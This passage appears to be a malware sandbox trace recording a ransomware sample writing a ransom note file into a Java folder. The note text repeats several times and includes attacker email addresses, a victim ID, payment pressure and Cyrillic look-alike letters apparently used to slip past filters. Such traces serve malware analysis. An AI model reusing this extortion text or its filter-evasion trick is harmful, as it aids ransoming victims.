n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n;Ò\x9d¹t\x1fÎ[.ÈæÖ\x09\x8cUYѸ0Þ¿\x9e£\x8d¥R\x17ö×", lpUsedDefaultChar=0x0) returned 7247 [0135.960] WriteFile (in: hFile=0x1d4, lpBuffer=0x1e943a8*, nNumberOfBytesToWrite=0x1c4f, lpNumberOfBytesWritten=0x395fdbc, lpOverlapped=0x0 | out: lpBuffer=0x1e943a8*, lpNumberOfBytesWritten=0x395fdbc*=0x1c4f, lpOverlapped=0x0) returned 1 [0135.961] CloseHandle (hObject=0x1d4) returned 1 [0135.961] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\bg85_info.rtf")) returned 0xffffffff [0135.961] GetLastError () returned 0x2 [0135.961] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\bg85_info.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0135.970] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0135.970] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0135.970] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 